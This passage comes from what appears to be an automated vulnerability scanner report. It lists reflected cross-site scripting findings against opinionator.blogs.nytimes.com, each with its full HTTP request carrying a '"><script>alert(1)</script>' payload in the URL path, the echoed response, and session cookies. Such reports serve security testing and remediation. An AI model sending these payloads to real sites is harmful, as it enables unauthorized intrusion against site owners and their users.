GET /category/allison-arieff8cc60"><script>alert(1)</script>34ddd92904c HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:16:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:16:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff8cc60\"><script>alert(1)</script>34ddd92904c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.180. http://opinionator.blogs.nytimes.com/category/allison-arieff/feed/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/allison-arieff/feed/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd36"><script>alert(1)</script>75e2794e565 was submitted in the REST URL parameter 3. This input was echoed as 4fd36\"><script>alert(1)</script>75e2794e565 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/allison-arieff/feed4fd36"><script>alert(1)</script>75e2794e565/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:12:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:12:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff/feed4fd36\"><script>alert(1)</script>75e2794e565&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.181. http://opinionator.blogs.nytimes.com/category/allison-arieff/page/2/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/allison-arieff/page/2/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c39"><script>alert(1)</script>39c9a1dd378 was submitted in the REST URL parameter 3. This input was echoed as 15c39\"><script>alert(1)</script>39c9a1dd378 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/allison-arieff/page15c39"><script>alert(1)</script>39c9a1dd378/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:16:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:16:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff/page15c39\"><script>alert(1)</script>39c9a1dd378/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
|
3.182. http://opinionator.blogs.nytimes.com/category/dick-cavett [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/dick-cavett |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea706"><script>alert(1)</script>3b4fefc3f96 was submitted in the REST URL parameter 2. This input was echoed as ea706\"><script>alert(1)</script>3b4fefc3f96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/dick-cavettea706"><script>alert(1)</script>3b4fefc3f96 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:16:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:16:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavettea706\"><script>alert(1)</script>3b4fefc3f96&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.183. http://opinionator.blogs.nytimes.com/category/dick-cavett/feed/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/dick-cavett/feed/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e8a"><script>alert(1)</script>fe172a7552a was submitted in the REST URL parameter 3. This input was echoed as 57e8a\"><script>alert(1)</script>fe172a7552a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/dick-cavett/feed57e8a"><script>alert(1)</script>fe172a7552a/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:13:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:13:29 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43855
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavett/feed57e8a\"><script>alert(1)</script>fe172a7552a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.184. http://opinionator.blogs.nytimes.com/category/dick-cavett/page/2/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/dick-cavett/page/2/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60706"><script>alert(1)</script>51866edec90 was submitted in the REST URL parameter 3. This input was echoed as 60706\"><script>alert(1)</script>51866edec90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/dick-cavett/page60706"><script>alert(1)</script>51866edec90/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:18:21 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:18:21 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43877
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavett/page60706\"><script>alert(1)</script>51866edec90/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
|
3.185. http://opinionator.blogs.nytimes.com/category/disunion [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/disunion |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d78"><script>alert(1)</script>084625fe73a was submitted in the REST URL parameter 2. This input was echoed as 83d78\"><script>alert(1)</script>084625fe73a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/disunion83d78"><script>alert(1)</script>084625fe73a HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:14 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion83d78\"><script>alert(1)</script>084625fe73a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.186. http://opinionator.blogs.nytimes.com/category/disunion/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/disunion/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1378a"><script>alert(1)</script>0da3b8f72d1 was submitted in the REST URL parameter 2. This input was echoed as 1378a\"><script>alert(1)</script>0da3b8f72d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/disunion1378a"><script>alert(1)</script>0da3b8f72d1/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:18 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion1378a\"><script>alert(1)</script>0da3b8f72d1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.187. http://opinionator.blogs.nytimes.com/category/disunion/feed/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/disunion/feed/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f948"><script>alert(1)</script>7bb52e55484 was submitted in the REST URL parameter 3. This input was echoed as 6f948\"><script>alert(1)</script>7bb52e55484 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/disunion/feed6f948"><script>alert(1)</script>7bb52e55484/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:22:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:22:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion/feed6f948\"><script>alert(1)</script>7bb52e55484&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.188. http://opinionator.blogs.nytimes.com/category/disunion/page/2/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/disunion/page/2/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf645"><script>alert(1)</script>7bdf5d8d7cb was submitted in the REST URL parameter 3. This input was echoed as bf645\"><script>alert(1)</script>7bdf5d8d7cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/disunion/pagebf645"><script>alert(1)</script>7bdf5d8d7cb/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43844
